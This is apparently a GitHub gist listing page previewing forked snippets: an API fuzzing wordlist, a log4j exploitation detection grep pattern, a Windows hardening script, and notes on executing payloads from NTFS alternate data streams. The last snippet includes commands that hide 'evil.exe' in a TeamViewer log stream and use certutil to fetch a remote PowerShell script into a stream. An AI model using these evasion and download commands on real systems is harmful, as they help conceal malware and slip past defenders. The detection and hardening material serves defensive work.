Skip to content

Instantly share code, notes, and snippets.

View oakkaya's full-sized avatar
🪁
Entertaiment Never End

Oğuzhan Akkaya oakkaya

🪁
Entertaiment Never End
View GitHub Profile
@oakkaya
oakkaya / List of API endpoints & objects
Created May 23, 2023 17:08 — forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@oakkaya
oakkaya / log4j_rce_detection.md
Created December 11, 2021 00:53 — forked from Neo23x0/log4j_rce_detection.md
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log
@oakkaya
oakkaya / windows_hardening.cmd
Created October 26, 2021 13:12 — forked from api0cradle/windows_hardening.cmd
Script to perform some hardening of Windows OS
::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
@oakkaya
oakkaya / Exe_ADS_Methods.md
Created October 26, 2021 12:22 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab